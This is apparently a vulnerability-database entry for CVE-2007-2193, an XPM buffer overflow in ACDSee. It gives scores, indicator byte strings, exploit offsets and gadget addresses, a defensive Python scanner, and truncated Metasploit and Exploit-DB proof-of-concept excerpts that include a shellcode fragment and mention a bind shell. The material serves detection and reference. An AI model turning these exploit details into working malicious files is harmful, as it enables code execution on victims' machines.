CVE-2007-2193
Published: 2007-04-24
Priority: P3 · 49 · critical · CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (Exploit-DB and Metasploit entries below)
EPSS: 36.57% (98.3th percentile)
Stack-based buffer overflow in the ID_X.apl plugin in ACDSee 9.0 Build 108, Pro 8.1 Build 99, and Photo Editor 4.0 Build 195 allows user-assisted remote attackers to execute arbitrary code via a crafted XPM file with a long section string. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acd_systems | acdsee | — | — |
| acd_systems | acdsee | — | — |
| acd_systems | photo_editor | — | — |
The version ranges are not recorded here; the builds named in the description are ACDSee 9.0 Build 108, ACDSee Pro 8.1 Build 99 and ACDSee Photo Editor 4.0 Build 195, and no fixed version is listed.
Detection & IOCs (extracted from sources)
- bytes: `\x2f\x2a\x20\x58\x50\x4d\x20\x2a\x2f\x0d\x0a\x73\x74\x61\x74\x69\x63\x20\x63\x68\x61\x72\x20\x2a\x50\x69\x78\x6d\x61\x70\x5b\x5d\x20\x3d\x20\x7b\x0d\x0a\x22\x35\x30\x39\x20\x34\x33\x38\x20\x32\x35\x36\x20\x33\x22\x2c\x0d\x0a\x22` (decodes to the XPM preamble `/* XPM */`, `static char *Pixmap[] = {`, the values section `"509 438 256 3",` and the opening quote of the next section)
- bytes: `\x05\x03\x81\x7C` (little-endian encoding of 0x7C810305, the kernel32 `call ebx` gadget named below)
- bytes: `\x90\x90\xeb\x16\x2a\x02\xfc\x7f\x2a\x02\xfc\x7f` (two NOPs, a `jmp short` over the following 0x16 bytes, then the dword 0x7ffc022a repeated twice)
- bytes: `\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98\x11\xbe\xa7\x83\xeb\xfc\xe2\xf4\x64\xf9\xfa\xa7\x98\x11\x35\xe2` (first 32 bytes of the PexFnstenvSub-encoded calc.exe shellcode; the first 16 match the `CalcShellcode` line of the Exploit-DB PoC below)
- Metasploit exploit constructs the XPM payload with more than 4200 bytes of alphanumeric-uppercase filler followed by an SEH overwrite; detect XPM files with abnormally long section strings
- Exploit uses an SEH-based overwrite (pop/pop/ret gadget) at offset 0x10a4 within the evil buffer; monitor for SEH chain corruption when ACDSee or ACDSeeQV processes XPM files
- Exploit payload uses the AlphanumUpper encoder with BadChars \x00 and a StackAdjustment of -3500; the encoded shellcode in the XPM section body will be fully alphanumeric uppercase
- Crafted XPM file structure starts with the '/* XPM */' magic header followed by a static char array declaration; files exploiting this CVE will have this header followed by an oversized buffer
- The RET address 0x10020758 is specific to ACDSee 9.0 Build 1008 only (the CVE description itself names Build 108); the exploit will not work against other builds without a different return address
- The 'call ebx' gadget at 0x7C810305 (kernel32) is specific to ACDSee 9.0 (ACDsee9.exe), while the pop/pop/ret gadget works for both ACDsee9.exe and ACDSeeQV.exe; since it is a kernel32 address it also depends on the Windows build the PoC was tested on
- The proof-of-concept exploit was tested only against Windows XP SP2 FR (French); reliability on other OS versions or service packs is not confirmed
- Metasploit module sets DisablePayloadHandler to true and EXITFUNC to process; the generated file is purely a client-side file-format exploit requiring user interaction to open the XPM
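The "abnormally long section string" indicator above can be checked structurally rather than with a fixed size threshold: an XPM3 file declares its geometry in the first quoted section (`width height ncolors chars_per_pixel`), so no honest section can be longer than one pixel row, `width * chars_per_pixel` bytes. The following scanner is an added example, not code from the advisory, the Metasploit module or the Exploit-DB PoC; it parses the quoted sections, derives that bound, and flags any section that exceeds it. The two sample files are constructed for the example (the crafted one reuses the preamble bytes from the IOC list and the 4200-byte filler length from the bullets), and the 64-byte slack and the assumption that XPM strings contain no backslash-escaped quotes are the author's choices here.

```python
"""Structural check for oversized XPM section strings (CVE-2007-2193 pattern)."""
import sys
from typing import List, Tuple

XPM_MAGIC = b"/* XPM */"


def parse_xpm_sections(data: bytes) -> List[bytes]:
    """Return every double-quoted section string of an XPM file, in order.

    XPM3 files are C source: a '/* XPM */' comment, a 'static char *name[] = {'
    declaration, then one quoted string per section (values, colours, pixel
    rows). Splitting on the raw '"' byte means an unterminated final string,
    as in a crafted file that never closes its quote, is still returned.
    Assumption: no backslash-escaped quotes (real XPM data does not use them).
    """
    if not data.lstrip().startswith(XPM_MAGIC):
        raise ValueError("missing '/* XPM */' magic")
    body_start = data.find(b"{")
    if body_start < 0:
        raise ValueError("no array body after the declaration")
    parts = data[body_start + 1:].split(b'"')
    return parts[1::2]  # odd-indexed pieces are the text inside quotes


def expected_max_section_len(values: str) -> int:
    """Longest legitimate section for a '<width> <height> <ncolors> <cpp>' header.

    A pixel row is width * chars_per_pixel bytes; colour-table entries are far
    shorter, so rows bound the size of any honest section string.
    """
    fields = values.split()
    if len(fields) < 4:
        raise ValueError("malformed values section: %r" % values)
    width, _height, _ncolors, cpp = (int(f) for f in fields[:4])
    if width <= 0 or cpp <= 0:
        raise ValueError("non-positive geometry in values section")
    return width * cpp


def check_xpm(data: bytes, slack: int = 64) -> Tuple[bool, str]:
    """Return (suspicious, reason).

    Flags a file whose header cannot be parsed, or that carries any section
    string longer than the declared geometry allows plus `slack` bytes
    (slack is an assumed allowance for stray whitespace inside quotes).
    """
    try:
        sections = parse_xpm_sections(data)
    except ValueError as err:
        return True, str(err)
    if not sections:
        return True, "no section strings"
    try:
        limit = expected_max_section_len(sections[0].decode("ascii", "replace"))
    except ValueError as err:
        return True, str(err)
    for idx, sec in enumerate(sections[1:], start=1):
        if len(sec) > limit + slack:
            return True, "section %d is %d bytes, geometry allows %d" % (
                idx, len(sec), limit)
    return False, "ok"


# Constructed sample: a legitimate 2x2 single-colour image.
BENIGN_XPM = (
    b"/* XPM */\n"
    b"static char *dot[] = {\n"
    b'"2 2 1 1",\n'
    b'"a c #000000",\n'
    b'"aa",\n'
    b'"aa"\n'
    b"};\n"
)

# Constructed sample: the preamble bytes from the IOC list (509x438 image,
# 3 chars per pixel) followed by a 4200-byte uppercase filler with no closing
# quote, mimicking the layout the Metasploit module is described as producing.
CRAFTED_XPM = (
    b"/* XPM */\r\n"
    b"static char *Pixmap[] = {\r\n"
    b'"509 438 256 3",\r\n'
    b'"' + b"A" * 4200
)


if __name__ == "__main__":
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, *check_xpm(fh.read()))
    else:
        print("benign:", check_xpm(BENIGN_XPM))
        print("crafted:", check_xpm(CRAFTED_XPM))
```

Run it with one or more file paths to scan them, or with no arguments to see both constructed samples: the benign file passes, and the crafted file is reported because a 4200-byte section cannot belong to a 509x3-byte pixel row. Because the bound comes from the file's own header, the check is not fooled by large but honest images, and a file that lies in its values section is flagged by the same logic as one that is merely oversized.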
No detection rules found.
Exploit-DB
ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)
exploitdb · 2010-09-25
---
```ruby
##
# $Id: acdsee_xpm.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # The mixin includes and the opening of initialize are missing from this
  # excerpt (the text between '<' and the first '=>' was lost when the page
  # was extracted); the scaffolding down to 'Name' is reconstructed so the
  # fragment parses, and the FILEFORMAT mixin is an assumption consistent
  # with a client-side file-format module.
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ACDSee XPM File Section Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ACDSee 9.0.
          When viewing a malicious XPM file with the ACDSee product,
          a remote attacker could overflow a buffer and execute
          arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'MC',
      'Version'        => '$Revision: 10477 $',
      'References'     =>
        [
          [ 'CVE', '2007-2193' ],
          [ 'OSVDB',
# (listing truncated on the source page)
```
Exploit-DB
ACDSee 9.0 - '.xpm' Local Buffer Overflow
exploitdb · 2007-04-22
---
```c
/*****************************************************************************
 * ACDSee v9.0 .XPM File Buffer Overflow                                      *
 *                                                                           *
 * ACDSee is vulnerable to an unspecified buffer overflow when processing a  *
 * crafted .XPM file.                                                        *
 * This exploit runs calc.exe or binds shell to port 4444, and works against *
 * ACDSee and ACDSee Quick View.                                             *
 *                                                                           *
 * Tested against Win XP SP2 FR.                                             *
 * Have Fun!                                                                 *
 *                                                                           *
 * Coded and discovered by Marsu                                             *
 *****************************************************************************/
#include "stdio.h"
#include "stdlib.h"

/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
/* (listing truncated on the source page) */
```
Metasploit
ACDSee XPM File Section Buffer Overflow
metasploit
This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
References
- http://osvdb.org/35236
- http://secunia.com/advisories/24994
- http://www.acdsee.com/support/knowledgebase/article?id=2800
- http://www.securityfocus.com/bid/23620
- http://www.vupen.com/english/advisories/2007/1489
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33812
- https://www.exploit-db.com/exploits/3776